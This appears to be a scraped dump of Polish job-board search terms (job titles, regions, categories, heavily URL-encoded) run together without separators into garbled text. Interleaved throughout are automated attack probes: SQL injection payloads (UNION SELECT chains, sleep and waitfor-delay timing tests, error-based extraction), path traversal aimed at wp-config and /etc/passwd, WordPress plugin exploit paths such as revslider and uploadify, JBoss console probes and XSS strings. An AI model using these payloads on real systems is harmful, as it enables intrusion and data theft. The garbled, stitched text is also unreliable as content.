przemys%c5%82owy/ monter niemcypraca%252bbez%252bznajomo%252525252525c5%2525252525259bci%252bj%252525252525c4%2525252specjalista+ds+wsparcia+sprzeda%25c5%25bcykierowca kat c' union all select null,null,null,null,null-- ptuhpomocnik+%c5%9bmiciarza niemcypraca fizyczna pomorskiekierowca++kat+c'+union+all+select+null,null,null,null--+qpccnarzędziowiecoperator+wózka+widlowego drezdenkopłatnos cipraca%2bbiurowa katowicepraca fizyczna budowlany warszawapraca%2bzakwaterowaniempracownik halisekretarka ze znajomo%c5%9bci%c4%85'a=0asystent/ka ds. ksi%252525c4%25252599gowosci pomorskiemonter konstrukcji/wp-login.php'a=0/wp-content/plugins/revslider/temp/update_extract/wp-admin/admin-ajax.php?action=revsmagazynier%2cprodukcja%2ckierowca+kat.b warszawamechanik+przemys%2525c5%252582owy/+monterprodukcja dla niepełnosprawnych' union all select null,null,concat(0x7170627871,0x7147744e465853694a78,0x717a786a71)#praca%2bz%2borzeczeniempomoc%2525252bksiegowejpraca%252b%252bfizyczna%252bbez%252bj%2525c4%252599zykawarehouse/wp-login.php%2527a%253d0%2527a%253d0 and 1%3d1praca z orzeczeniem o niepe%c5%82nosprawno%c5%9bci kierowca kat.bpracownik%2bmagazynowy%2b%28m/k%29monter+konstrukcji/wp-login.php%27a%3d0/wp-admin/admin-ajax.php%3faction%3drevslider_show_image%27a%3d0%27a%3dspecjalista%2bds%2bwsparcia%2bsprzeda%c5%bcydoradca+klienta, krakówmonter+konstrukcji/wp-login.php'a=0/wp-adminandroidin%25c5%25bcynieria+%257c+projektowanie podkarpackiepracownik+szklarnioperator w%25c3%25b3zka wid%25c5%2582owego hamburgpracownik produkcji piotrków trybunalskikierowca++kat+c+union+all+select+14%2c14%2c14%2c14%2cconcat%28concat%28%27qqzpq%27%2c%27hyjmaumgvckxychqldwdtgvuhqvfxznvuxpgtxscadministracja biurowa opoletransport%252b%252525257c%252bspedycja(select (case when (6699=7591) then 6699 else 6699*(select 6699 from information_schema.plugins) end))specjalista%25252bw%25252bdziale%25252bzaopatrzeniareferentkontrola+jako%252525252525c5%2525252525259bcikierowca kat c union all select null%252cnull%252cnull%252cnull%252cnull%252cnull%252cconcat%2528cokierrowca kat b%2527a%253d0kierowca kat c union all select concat(concat('qqzpq','hkuhzirnbhswmykcjwbxedektgminnipexvsbuyh'),'qbbvq'),null,null,null,null,pracownik%252bprodukcikontroler jako%c5%9bci warszawaphp developer wrocławnauczyciel+j%c4%99zyk+niemiecki/login.action/web-console/admin-console/login.seam,(select (case when (8305=8785) then 1 else 1/(pracownik%2bdzia%2525252525c5%252525252582u%2badministracjimonter konstrukcji/wp-login.php%27a%3d0/07545460.php%27 and %27x%27%3d%27xkierownik w dps krakównauczyciel+j%c4%99zyk+niemiecki/login.action/web-console/admin-console/login.seam" and 9584=concat(char(113)+char(113)+char(106)/etc/passwd%'+union+all+select+null,null,null,null,null,null,null,null--+xstvkasjer wrocławoperator+wózka+widłowego+–+2+zmiany,+bez+doświadczeniawarehouse/wp-login.php'a=0'a=0location=tychy99999"+union+select+unhex(hex(version()))+--+"x"="x"and(select*from(select+sleep(0))sekretarka, sekretarz, pracownik biurowy, pracownik działu kadrprodukcja dla niepełnosprawnych union all select null,concat(0x7170627871,0x4f6f746d53696b4b6a59,0x717a786a71),null,null,null,nphysical workmagazynier (m/k) opolekierowca kat c union all select null,null,null,null,null,concat(concat('qqzpq','wmsiqvjkatqiwnbivqicnqvwzddpyuntajhikxew'),'qbbnauczyciel+j%c4%99zyk+niemiecki/login.action/web-console/admin-console/login.seam';declare @hpav nvarchar(4000);set @hpav=(seleckierowca+w%c3%b3zka+wid%c5%82owego warmian-masurian+voivodeshiptechnolo+konstrukcji/wp-login.php%25252527a%2525253d0kierowca kat c union all select 14%252c14%252c14%252cconcat%2528concat%2528%2527qqzpq%2527%252c%2527xoirqgorcl%2527%2529%252c%2operator+wozka+widlowego krakówkontrola%2bjako%25252525252525252525c5%252525252525252525259bcipraca%2bfizyczna sosnowiecm%25c5%2582odszy konsultant ds. rekrutacji %2528m/k%2529praca+fizyczna pabianicelogistyka sosnowiecpraca dla ucznia wakacje krakówkonsultant+ds.+obs%252525c5%25252582ug+klienta+niemieckoj%252525c4%25252599zycznegokonsultant j%2525c4%252599zyk angielskisosnowiecmarketing %7c reklama %7c prz orzeczeniem/canvas4.1/html/js/jquery.jsmarketing british councilindustry+|+productionmontażysta+stelaży+meblowychkierowca+kat+dszkoleńkętypracownik dzia%2525c5%252582u hrwprowadzanie%2bdanych%2b%2bz%2borzeczeniemimages background removal jobs warszawapraca%2bbez%2bznajomo%25252525252525c5%252525252525259bci%2bj%25252525252525c4%2525252 niemcyprzemys%252525c5%25252582 %2525257c produkcja lublinmonter+konstrukcji/wp-login.php'a=0/wp-admin/admin-ajax.php?action=revslider_show_image'a=0'a=0+and+1=1"+and+"x"="xtransport+%7c+spedycja tychymonter konstrukcji/wp-login.php%27a%3d0/wp-admin/admin-ajax.php%3faction%3drevslider_show_image%27a%3d0%27a%3d0 and 1%3d1%27pracownik%2bmagazynowy%2b-%2b18%252c29%2bz%25c5%2582%2bbrutto/godz.%2bplus%2bpremiemanager+sprzeda%2525c5%2525bcywłodawaasystent/ka ds. administracji i obsługi klienta nasielskin%25252525c5%25252525bcynier jako%25252525c5%252525259bci w dziale projekt%25252525c3%25252525b3wkierowca w%c3%b3zka wid%c5%82owego warmian-masurian voivodeshiptaryfy+i+operatorzy+telefonii+komórkowejkierowca+ceniepołomicefinanse+|+bankowość lublintransport %257c spedycja grodzisk mazowieckiochrona emerytasystent ds. ksi%25c4%2599gowosciz+j%2525c4%252599zykiem+w%2525c5%252582oskimmalarz budowlanysprzedaż mazowieckiemorągtransport%2b%257c%2bspedycja zachodniopomorskiemagazynier%2525252525252cprodukcja%2525252525252ckierowca%252bkat.b mazowieckieprzemys%25c5%2582+%257c+produkcja podkarpackieскорая помощьmonter+konstrukcji%2fwp-login.php%27a%3d0%2f07545460.php+and+1%3d1%27a%3d0transport %257c spedycjanowe+miasto+lubawskiein%c5%bcynieria %7c projektowanie lublinwarehouse/wp-login.php%27a%3d0%27a%3d0location%3dtychy+or+%281%2c2%29%3d%28select%2afrom%28select+name_const%28char%28111%2c108%kierowca+transport+mleka niemcyprzemysł | produkcja tychypraca%2bbez%2bznajomo%c5%9bci%2bj%c4%99zykagłówny+operator+tekturnicyengineer polandmonter konstrukcji/wp-login.php%27a%3d0/07545460.php/wp-content/themes/churchope/lib/downloadlink.php%3ffile%3d../../../../wp-coosoba+sprzątająca(select 2290 from(select count(*),concat(0x7176717071,(select (elt(2290=2290,1))),0x716b766b71,floor(rand(0)*2))x from informatidostawca warszawamedycyna %25252525257c opieka zdrowotnapralniapraca+fizyczna+spawacz warszawaspecjalista ds reklamyspecjalista+ds.+sprzedaży warszawapracownik produkcji %28m/k%29'a=0kierowca+c+e kujawskopraca fizyczna sprz%25c4%2585taczkatransport %2525252525257c spedycja%25252525252527a%2525252525253d0%25252525252527a%2525252525253d0in%c5%bcynieringunowaopiekunka do osób starszych w niemczechprzemysł | produkcja czosnówpracownik monta%252525c5%252525bcusekretarka+ze+znajomo%25252525c5%252525259bci%25252525c4%2525252585+j.+rosyjskiegomonter konstrukcji/wp-login.php%2525252527a%252525253d0/07545460.php and 1%252525253d1%2525252527a%252525253d0technolo konstrukcji/wp-login.php%2527a%253d0specjalista ds. kadr i rekrutacji %25252528m/k%25252529monter konstrukcji/wp-login.php%252525252527a%25252525253d0/07545460.php99999%252525252522 union select unhex%252525252528hex%25aluglass - realizacja piotr kalbarczyk;select dbms_pipe.receive_message(chr(118)||chr(110)||chr(67)||chr(67),32) from dual--operator sprzetu budowlanego katowicein%2525c5%2525bcynier+budowy/wp-login.php%2527monter%2525252fka+element%2525252525c3%2525252525b3w+do+siedze%2525252525c5%252525252584+samochodowychmonter pod%25c5%2582%25c3%25b3g niemcytransport %7c spedycja' and 'x'='y tychyprzemysł | produkcja kielcet%c5%82umacz+j%c4%99zyka+migowegooperator+w%252525c3%252525b3zka+wid%252525c5%25252582owego+hamburgpracownik%2bsklepu%2bodzie%c5%bcowego%2b(m/k)specjalista%2bds.%2bobs%2525252525c5%252525252582ugi%2bklientamontaż instalacji elektrycznych pomorskiebudownictwo%25252b%252525257c%25252bgeodezja francjapracownik%2bsekretariatu szczecinm%c5%82odszyedukacja %7c nauka %7c szkolenia lublinrekrutacja+pracownik%252525c3%252525b3wz+orzezceniemobs%c5%82uga+klientakierowca kat b warszawapracownik porz%2525c4%252585dkowymonter%25252525252fka+element%2525252525252525c3%2525252525252525b3w+do+siedze%2525252525252525c5%252525252525252584+samochodowy niemcytrener siłowni'a=0specjalista+ds+rozlicze%c5%84praca%2bcha%c5%82upniczapilarz/drwalmonter konstrukcji/wp-login.php'a=0/wp-admin/admin-ajax.php?action=revslider_show_image'a=0'a=0 and 1=1" and "x"="ypracownik+magazynowy+%2528m/k%2529 katowicemechanik%2bprzemys%25c5%2582owy/%2bmonterkierowca kat c union all select null%2cnull%2cconcat%28concat%28%27qqzpq%27%2c%27umgimyqgojfmntwarehouse+workera portier szpital krakówbadania i rozwój szczecinmonter konstrukcji/wp-login.php%252527a%25253d0/wp-admin/admin-ajax.php%25253faction%25253drevslider_smonter konstrukcji%25252fwp-login.php%2525252527a%252525253d0%25252f07545460.php and 1%252525253d1%2525252527a%252525253d0internet %25257c e-commerce%2527a%253d0pracownik pŁoŃskpracownik%2bdzia%c5%82u%2bhrmanager sprzedaży (m/k)monter konstrukcji/wp-login.php%25252527a%2525253d0/07545460.php%25252527 or %252525281%2525252c2%25252529%2525253niepełny etat warszawakuyavian-pomeranian+voivodeshipkadra zarz%c4%85dzaj%c4%85cakontrola jakości bielskopraca%2525252525252bzdalna polskapraca biurin%2525c5%2525bcynier+zak%2525c5%252582adusekretarka ze znajomo%252525c5%2525259bci%252525c4%25252585 j. francuskiegostraszynoperator%2bw%2525c3%2525b3zka%2bwid%2525c5%252582owego mazowieckiebełchatówhr szczecinmonter+konstrukcji/wp-login.php%2525252527a%252525253d0/07545460.php%2525252527+and+%2525252527x%2525252527%25pracownik+do+sortowania+owoc%c3%b3wkierownik+produkcji śląskiealuglass - realizacja piotr kalbarczyk,(select (case when (6243=6243) then 1 else 6243*(select 6243 from information_schema.plugkierowca kat c union all select null%25252cnull%25252cnull%25252cnull%25252cnull%25252cnull%25252cnull%25252cnull%25252cnull%25specjalista%25252bds.%25252bkadr%25252bi%25252bp%25252525c5%2525252582acopolskiewarehouse/wp-login.php'a=0'a=0" and "x"="xmonter konstrukcji/wp-login.php%27a%3d0/wp-content/plugins/revslider/temp/update_extractsprzedaż | obsługa klienta jastrzębie zdrójkey account manager %252528m/k%252529%27a%3d0specjalista ds. wdro%c5%bcenia platformyspecjalista+ds.+kadr+i+płac+(m/k) wielkopolskiepodkowa leśnamonter konstrukcji/wp-login.php%253cbodybackground%253d%2522javascript%253aalert%2528%2527mysqlerror%2527%2529%2522%253eelektryk %2525252528m/k%2525252529 pomorskiehydraulik/monter%252binstalacjispedytor+mi%25c4%2599dzynarodowywarszawamonter rusztowa%c5%84sta%2525c5%2525bcysta+w+dziale+rekrutacjiin%2525c5%2525bcynier%2bbudowy/wp-login.php%22%2band%2b%22x%22%3d%22x"and(select*from(select+sleep(2))a/**/union/**/select+1)="kierowca grudziądz(select (case when (1796=8259) then 'aluglass - realizacja piotr kalbarczyk' else (select 8259 union select 7729) end))drwal+pilarznauczyciel+j%25c4%2599zyk+niemiecki/login.action/jmx-console/web-console/invokerpracownik+porz%2525252525c4%252525252585dkowypuckmechanik%2bsamochodowy niemcykontrola%2bjako%25c5%259bci mazowieckiefinlandoperator w%252525c3%252525b3zka wid%252525c5%25252582owego mazowieckienauczyciel+angielskiegodekarz+-blacharzadministracja personalna warszawapracownik ksi%c4%99garniwarehouse/wp-login.php%25252527a%2525253d0%25252527a%2525253d0 and 1%25253e1specjalista ds wsparcia sprzeda%25c5%25bcysekretarka+ze+znajomo%c5%9bci%c4%85+j.+niemieckiegonauczyciel j%25c4%2599zyka francuskiegomalczyceprodukcja dla niepe%2525c5%252582nosprawnych%252527a%25253d0kierowca kat c union all select concat%28concat%28%27qqzpq%27%2c%27dlgzawmngd%27%29%2c%27qbbvq%27%29%2c14%2c14%2c14%2c14%2c14%2kierowca kat c%27 union all select null%2cnull%2cnull%2cnull%2cnull-- ptuhkierowca c%2525252be niemcymechanik+silnik%c3%b3w+lotniczychunited kingdompraca w muzeum warszawabez j%252525c4%25252599zyka niemcyca%252525c5%25252582a+polskasprzataczka+w+szkole%22+and+%22x%22%3d%22ymonter konstrukcji/wp-login.php'a=0/uploadify/uploadify.php?folder=pracownik%252bmagazynowy%252b-%252b18%25252c29%252bz%2525c5%252582%252bbrutto/godz.%252bplus%252bpremiemonter konstrukcji/wp-login.php%25252527a%2525253d0/07545460.php and 1%2525253e1kierowca%25252bw%25252bwypo%2525252525c5%2525252525bcyczalni%25252bsamochodowej%25252b%252525252528m%252fk%252525252529 niemcypracownik+hali+,+supersamyaluglass+-+realizacja+piotr+kalbarczyk,(select+(case+when+(4201=5277)+then+1+else+1/(select+0)+end))it gdańskpracownik%252bprodukcyjny%252b%25252528m/k%25252529kierowca+%2528m%252fk%2529+%2528kat.+c+e%252c+hakowce%2529monter konstrukcji/wp-login.php%27a%3d0/07545460.php%27 or %281%2c2%29%3d%28select%2afrom%28select name_consoperator w%2525c3%2525b3zka wid%2525c5%252582owego %252528m/k%252529kierowca (m/k) (kat. c+e, hakowce) poznańkierowca++kat+c+union+all+select+null%2cnull%2cconcat%28concat%28%27qqzpq%27%2c%27gqxldvjcba%27%29%2c%27sprzedaż | obsługa klienta gdańskoperator+w%c3%b3zka+wid%c5%82owego+20%2c23praktyki+%257c+sta%25c5%25bcaaaaaaaawszystkie+prace gorzów+wielkopolskiin%2525c5%2525bcynier budowy/wp-login.php%2527ochrona+dla+zwierząt toruńlogopeda,+dozorca,+pracownik+ochronyoprator+wózka dolnośląskiepraca++fizyczna+bez+j%25252525252525c4%2525252525252599zyka niemcykontrola%252525252bjako%2525252525c5%25252525259bcispecjalista+ds.+p%25c5%2582ac+i+kadrkonsultant ds. wdro%25252525c5%25252525bce%25252525c5%2525252584frizer do psovpraca w biurze z językiem ukrainskimtechnik+elektryk/wp-login.php%27a%3d0medycyna | opieka zdrowotnaspecjalista ds wsparcia sprzedaży warszawaadministracja++pa%c5%84stwowaa+pilot+project+for+a+new+libertarian+floating+city+will+have+300+homes,+its+own+government,+andinżynier robót warszawaaluglass - realizacja piotr kalbarczyk order by 4117-- rtofmonter konstrukcji/wp-login.php%3cinputtype%3d%22image%22src%3d%22javascript%3aalert%28%27mysqlerror%27%29%3b%22%3e and 1%3d1monter konstrukcji//wp-admin/admin-ajax.php?action=revolution-slider_show_image'a=0'a=0praca dla moll wrocławpraca+pomoc+ksi%c4%99gowej wielkopolskienowa+sólasystent/ka ds. administracji i obs%c5%82ugi klienta ze znajomo%c5%9bci%c4%85 j%c4%99zyka ruskiego warszawapracownik+działu+obsługi+klienta warszawamechanik silnik%c3%b3w lotniczychmonter%25252fka element%252525c3%252525b3w do siedze%252525c5%25252584 samochodowych niemcysprzedawca kasjer poznańubezpieczeniapraca fizyczna bez j%25252525c4%2525252599zyka niemcysprzedaż+|+obsługa+klienta tomaszów+mazowieckipraca+pomoc+księgowej poznańtechnolo+konstrukcji/wp-login.php%27a%3d0sprz%2525c4%252585taczka w szkolepracownik biurowy na magazyn krakówkierowca kat c' union all select null,null,null-- lyufprodukcja dla niepełnosprawnych%' union all select null,null,null,null,null-- qopfkierowca wywrotki niemcywarehouse/wp-login.php'a=0'a=0location=tychy99999"+union+select+unhex(hex(version()))+--+"x"="x"and"f"="rbudownictwo%2525252b%25252525257c%2525252bgeodezja francjatransport %25257c spedycja%2522 and %2522x%2522%253d%2522xpraca%2525252bogulnobudowlana niemcypracownik produkcji %25252528m/k%25252529'a=0pracownik szklarni francjapracownik%2badministracyjno-biurowy%2bz%2borzeczeniem%2bo%2bniepe%c5%82nosprawno%c5%9bcitraffic warszawabez doświadczenia wrocławoperator%252bw%252525c3%252525b3zka%252bwid%252525c5%25252582owego%252b%25252528m/k%25252529tłumacz ukraińskiegoadministracja+biurowa%252527a%25253d0transport+|+spedycja'a=0 warszawacała+polskapracownik monta%25c5%25bcu %2528m/k%2529 sosnowiecmonter konstrukcji/wp-login.php%25252525252527a%2525252525253d0/uploadify/uploadify.php%2525252525253ffolder%2525252525253dnauczyciel język niemiecki/login.action/web-console/admin-console/login.seam/admin-console/github.com/joaomatosf/jexbomontaż+instalacji+elektrycznychkierowca bes znajosci jenzykatrawnikisprzeda%25c5%25bc %257c obs%25c5%2582uga klienta kielcemonter konstrukcji/wp-login.php%27a%3d0/uploadify/uploadify.php%3ffolder%3dpracownik+do+produkcji+pizzysprzeda%c5%bc+%7c+obs%c5%82uga+klienta lublinangielski+hiszpa%c5%84ski warszawaprzedstawiciel+handlowy pomorskieadministracjq+biurowa warszawaosoba+sprz%c4%85taj%c4%85camonter konstrukcji/wp-login.php%27a%3d0/07545460.php99999%22 union select unhex%28hex%28version%28%29%29%29 -- %22x%22%3d%22x%27przemys%c5%82 %7c produkcja sosnowiecmonter+konstrukcji/wp-login.php%27a%3d0/wp-admin/admin-ajax.php%3faction%3drevslider_show_image%27a%3d0%27a%3d0pracownik monta%25c5%25bcuprzemys%25c5%2582+%257c+produkcja+krojczy pomorskiekierowca++kat+c%25%27+union+all+select+null%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull--+kcgwpracownik%252bprodukcji%252b%252528m/k%252529%d0%bf%d0%be%d0%bc%d0%be%d1%89%d0%bd%d0%b8%d0%batechnolog %2525c5%2525bcywno%2525c5%25259bcilogistyka | dystrybucja zielona góraopieka'technik elektryk %25252528m/k%25252529monter/ka element%252525c3%252525b3w do siedze%252525c5%25252584 samochodowychmiędzyrzeczkontrola+jako%c5%9bci polskain%25252525c5%25252525bcynier+mechanikgłogówreferent+ds.+administracji+%2528m/k%2529key%2baccount%2bmanager%2b(m/k)przedstawiciel%2bhandlowy podkarpackieszlifierzoperator+w%2525c3%2525b3zk%2525c3%2525b3w+wid%2525c5%252582owych szczecinwarehouse/wp-login.php%2525252527a%252525253d0%2525252527a%252525253d0location%252525253dtychy and 1%252525253d1in%252525c5%252525bcynieriaspecjalista w dziale zaopatrzenia gorzów wielkopolskikafelkarzspecjalista ds rozlicze%25252525c5%2525252584in%2525c5%2525bcynier+sprzeda%2525c5%2525bcybez+j%252525c4%25252599zyka niemcypakowacz bez j%25252525c4%2525252599zykakierowca++kat+c+union+all+select+14%2c14%2c14%2c14%2cconcat%28concat%28%27qqzpq%27%2c%27havbsprnla%27%29%2c%27qbbvq%27%29%2c14%2operator rolniczyoperator w%2525c3%2525b3zka wid%2525c5%252582owegokontroler%25252bjako%2525c5%25259bci%25252b%252528m/k%252529zamówieńpracownik produkcji %252528m/k%252529 niemcypraca%25252525252bfizyczna%25252525252bspawaczbrzezinyspecjalista%2bds.%2bcz%c4%99%c5%9bci%2bzamiennychprodukcja+dla++niepe%2525c5%252582nosprawnychpraca bez znajomo%2525252525c5%25252525259bci j%2525252525c4%252525252599zyk niemcymagazynowy %2528m/k%2529specjalista+d/s+importu+-eksportu+%252525252c+obs%25252525c5%2525252582uga+klienta+%252525252c+ar+%2warehouse/wp-login.php%2525252527a%252525253d0%2525252527a%252525253d0location%252525253dtychy%2525252522+or+%25252525281%252525specjalista+ds.+sprzedaży gorzów+wielkopolskihuman+resources+%25257c+kadrybadania%252bi%252brozw%25c3%25b3jmagazynier - nie wymagamy do%c5%9bwiadczenia%21bielsk podlaskitransport %257c spedycja%2527a%253d0%2527a%253d0opiekunka+osób+starszych gdańskin%25252525c5%25252525bcynieria%252b%252525257c%252bprojektowanie podkarpackiesprzątanie warszawapraca fizyczna bez j%2525c4%252asystent dzia%2525c5%252582u hrwarehouse/wp-login.php%27a%3d0%27a%3d0' and 'x'='ybudownictwo %2525252525257c geodezjaenergetyka+%7c+elektronika niemcykierowca c e niemcymanager rejonu sprzeda%25c5%25bcyaluglass - realizacja piotr kalbarczyk rlike sleep(32)-- ftictechnik elektryk (m/k) niemcypraca%2bniemcparkieciarzy%2bpraca%2bfizyczna1/2technik%2bkonsultant%2b%252528m/k%252529kierowca+w+wypo%25252525252525c5%25252525252525bcyczalni+samochodowej+%2525252525252528m/k%2525252525252529transport%2b%7c%2bspedycja szczecinsekretarka ze znajomo%25c5%259bci%25c4%2585 j. francuskiegowarehouse/wp-login.php%2527a%253d0%2527a%253d0location%253dtychy and 1%253e1widuchowakierowca++kat+c+union+all+select+14,14,14,concat(concat('qqzpq','xoirqgorcl'),'qbbvq'),14,14,14--+klbotechnik%252belektryk%252b%252525252525252528m/k%252525252525252529spytkowicespecjalista ds turystyki śląskiedoradztwo+%25257c+konsultinglimanowamonter konstrukcji/wp-login.php%27a%3d0/wp-admin/admin-ajax.php%3faction%3drevslider_show_image%27a%3d0%27a%3d0 and 1%3d1%22 andj%2525252525c4%252525252599zyk+w%2525252525c5%252525252582oskilogistyka %252525257c dystrybucjapracownik porządkowypracownik%252bmagazynowy%252b-%252batrakcyjna%252bstawka%252bi%252bbezp%25c5%2582atny%252bdojazdtransport+%257c+spedycja%22+and+%22x%22%3d%22xmonter konstrukcji/wp-login.php'a=0/wp-admin/admin-ajax.php?action=revslider_show_image'a=0'a=0' and 'x'='y' and 'x'='xadministracja perosnalnaпродажа | обслуживание клиентовkierowca kat c union all select null,null,null,null-- wkbnmsfranceprzemysł+|+produkcja pomorskiepraca+bez+znajomo%252525252525c5%2525252525259bci+j%252525252525c4%25252525252599zyk niemcyjunior front end developer wrocławpracownik produkcyjny Łódźkierowca%2b%2525252528m/k%2525252529%2b%2525252528kat.%2bc%252525252be%252525252c%2bhakowce%2525252529pracownik szklarni z ogórkamiit sta%2525c5%2525bc%2527a%253d0specjalista ds. księgowości łódzkiepracownik+biurowy płońskmistrz zmiany%2525252cpraca+z+orzeczeniem+o+niepe%c5%82nosprawno%c5%9bcipracownik+montażu+(m/k) katowiceobs%2525c5%252582uga+klientaradzionkówzłoty stokpraca b poznańinformation technology zachodniopomorskiemonter konstrukcji/wp-login.php'a=0/wp-content/uploads/51217766.phpwarehouse/wp-login.php%252527a%25253d0%252527a%25253d0location%25253dtychy%252522 and %252522x%252522%25253d%252522x'a=0monter konstrukcji/wp-login.php'a=0/license.php'a=0operator%2bkoparki%2c%2bbrukarz%2c%2bpomocnik%2bbudowlanyopole+voivodeshipdoradca+techniczny+%2528komponenty+maszyn%2529kontrola%25252525252bjako%2525252525252525c5%25252525252525259bci polskasprzedaż | obsługa klienta poznańpraktyki %7c sta%c5%bcaaaaaaaapraca+fizyczna+sprzątaczka śląskiespecjalista%2bds.%2bcz%252525c4%25252599%252525c5%2525259bci%2bzamiennychin%2525c5%2525bcynier zak%2525c5%252582adu brzeg dolnytrener+siłowni'a=0układanie+towarubełżycewhat is rmm (remote monitoring and management)? niemcygrafika | fotografia | kreacjakontrola jako%252525c5%2525259bci polskain%252525c5%252525bcynier%252belektronik%252b%25252528m/k%25252529administrator+siecihr%2bspecialistprzemys%2525252525c5%252525252582+%25252525257c+produkcjaasystent/ka ds. administracji i obs%25252525c5%2525252582ugi klientareferent ds. funduszy europejskich (m/k)monter+konstrukcji/wp-login.php'a=0/07545460.php"+and+"x"="y'a=0kierowca%252525252bbes%252525252bznajosci%252525252bjenzyka niemcytłumacz+ukraińskiegoprogramista+ds.+bazy+danychkierowca w wypo%252525c5%252525bcyczkontroler jako%2525c5%25259bcinie+pełny+etatkierowca pomorskiepraca+ochrona warszawawarehouse/wp-login.php%252527a%25253d0%252527a%25253d0 and 1%253d1nauczyciel j%25c4%2599zyk niemiecki/login.action/web-console/invoker/invoker/jmxinvokerservletochrona+fizycznakierowca+w+wypo%2525252525c5%2525252525bcyczalni+samochodowej+%252525252528m/k%252525252529inżynieria+|+projektowanie śląskielogistyka+|+dystrybucja pruszkówkontroler+jakości śląskiemonter konstrukcji/wp-login.php%252527a%25253d0/07545460.php%252527 or %2525281%25252c2%252529%25253d%252528select%25252afrom%25rolnictwo %25257c ochrona %2525c5%25259brodowiskagraduate civil/structural engineerkierowca kat c%2525%2527 union all select null%252cnull%252cnull%252cnull%252cnull%252cnull-- bsymkierowca %25252528m%25252fk%25252529 %25252528kat. c%2525252be%2525252c hakowce%25252529 niemcywarehouse/wp-login.php'a=0'a=0location=tychy99999" union select unhex(hex(version())) -- "x"="xp%c5%82atnos+citechnik konsultant %2528m/k%2529administracja biurowa%27a%3d0choszcznopraca+za+granicąmonter konstrukcji/wp...//wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php%3ffilename%3d../../../../wp-config.kontroler jako%2525252525c5%25252525259bci %252525252528m/k%252525252529pracownik%2bksi%252525c4%25252599gowo%252525c5%2525259bcipracownik magazynowy (m/k)z+j%c4%99zykiem+w%c5%82oskimkierowca%2bw%2bwypo%252525c5%252525bcyczalni%2bsamochodowej%2b%25252528m%2fk%25252529 niemcydla%2bobcokrajowc%25252525c3%25252525b3wtransport%2b%25257c%2bspedycjaaaaaaaaaj%2525c4%252599zyk w%2525c5%252582oskigrodkówmonter+konstrukcji/wp-login.php%2527a%253d0/wp-admin/wp-admin/admin-ajax.php%253faction%253drevslider_show_image'a=0praca+fizyczna świdnicabiuroprzemys%2525c5%252582 %25257c produkcja gliwicepracownik%2bprodukcji%2b-%2bbezp%c5%82atny%2bdow%c3%b3z%2bdo%2bmiejsca%2bpracy!logistyka %7c dystrybucja niemcyasystent działu zakupówmanager+sprzeda%252525c5%252525bcywarehouse/wp-login.php'a=0'a=0+and+1=1inżynier budowy/wp-login.php and 1>1samodzielna+księgowa warszawapraca%2bpomoc%2bksi%25252525c4%2525252599gowepraca biurowa%252c administracyjnaprzemysł+|+produkcja pszczynam%c5%82odszy analitykprzemys%25252525c5%2525252582 %252525257c produkcja krojczynauczyciel j%2525c4%252599zyk niemiecki/login.action/admin-console//github.com/joaomatosf/jexbossmonter konstrukcji/wp-login.php%252527a%25253d0/07545460.php and 1%25253e1grodzisk mazowieckitechnik+handlowiec Łódzkiekierowca%2525252bw%2525252bwypo%252525c5%252525bcyczalni%2525252bsamochodowej%2525252b%25252528m%2fk%25252529 niemcykluczew języku ukraińskimkierowca kat c%2525%2527 union all select null%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnullextractvalue(1,concat(char(126),md5(1009882062)))kalwaria+zebrzydowskaosoba%2bsprz%25c4%2585taj%25c4%2585cakontrola jako%2525252525c5%25252525259bci mazowieckiepraca+bez+znajomo%252525c5%2525259bci+j%252525c4%25252599zyk niemcytransport | spedycja mazowieckiein%252525c5%252525bcynier zak%252525c5%25252582adu brzeg dolnypracownik+dzia%25c5%2582u+w%25c4%2599dlinypracownik%25252bszklarni francjakierowca++kat+c+union+all+select+null,null,null,null--+wkbnprodukcja dla niepełnosprawnych;select sleep(5)#tłumacz francuskiegomechanik samochod%25c3%25b3w ci%25c4%2599%25c5%25bcarowychpracownik+hali katowicedoradca%2bds%2bnieruchomo%2525c5%25259bci'a=0pracownik%2bmonta%c3%85%c2%bcupracownik+produkcji policepracownik+myjni+samochodowej+%25252528m/k%25252529kierowca+w+wypo%25252525c5%25252525bcyczalni+samochodowej+%2525252528m%25252fk%2525252529 niemcypraca zdalna z domu  oświęcimoperator cnc - atrakcyjne wynagrodzenie%21operator%2bw%25c3%2583%25c2%25b3zk%25c3%2583%25c2%25b3w%2bwid%25c3%2585%25c2%2582owychmonter konstrukcji/wp-login.php%252527a%25253d0/wp-admin/wp-admin/admin-ajax.php%25253faction%25253drevslider show image" and "xspecjalista+ds.+sprzeda%25c5%25bcy+produkt%25c3%25b3w+bankowychmagazynier/operator w%c3%b3zka wid%c5%82owego %28m/k%29magazynier %252c budowlankapasłękprzemysł | produkcja sosnowiecinternet %257c e-commerce szczecinfrezer konwencjonalnymonter%25252fka+element%2525252525c3%2525252525b3w+do+siedze%2525252525c5%252525252584+samochodowy niemcyaluglass - realizacja piotr kalbarczyk;declare @x char(9);set @x=0x303a303a332;waitfor delay @x--obsługa+bagażowaspecjalista+ds.+kadr+i+rekrutacji+%2528m/k%2529budownictwo%252525252b%2525252525257c%252525252bgeodezja francjakierowca w wypożyczalni samochodowej (m/k) gryficetechnolog+%2525c5%2525bcywnosci mazowieckiekontrola+jako%252525c5%2525259bcipracownik fizycznaprzemysł | produkcja mazowieckiej%25c4%2599zyka hiszpa%25c5%2584skiegopraca+zdalna wrocławm%c5%82odszy warszawaprzemys%c5%82+%7c+produkcja zachodniopomorskiej%2525252525c4%252525252599zyk%25252bw%2525252525c5%252525252582oskioperator w%252525252525c3%252525252525b3zka wid%252525252525c5%25252525252582owego niemcymonter konstrukcji/wp-login.php%252525252527a%25252525253d0/07545460.php and 1%25252525253e1kierowca+wózka+widłowegonie+pełny+etat toruńpraca%2525252bbez%2525252bznajomo%25252525252525c5%252525252525259bci%2525252bj%25252525252525c4%2525252525252599zykafinanse+%7c+bankowo%c5%9b%c4%87 warszawasekretarka ze znajomo%c5%9bci%c4%85 j. angielskiegokierowca %25252528m%25252fk%25252529 %25252528kat. c%2525252be%2525252c hakowce%25252529monter konstrukcji/wp-login.php%252527a%25253d0/wp-admin/wp-admin/admin-ajax.php%25253faction%25253drevslider show image' and 'xpraca biurowa warszawasopotkierowca w wypo%25c5%25bcyczalni samochodowej %2528m/k%2529 wielkopolskiepracownik produkcji - praca dla kobiet i m%c4%99%c5%bcczyznkierowca w wypo%c5%bcyczalni samochodowej (m/k) katowiceiławaelektryk+%2528m/k%2529przemys%25c5%2582 %257c produkcja 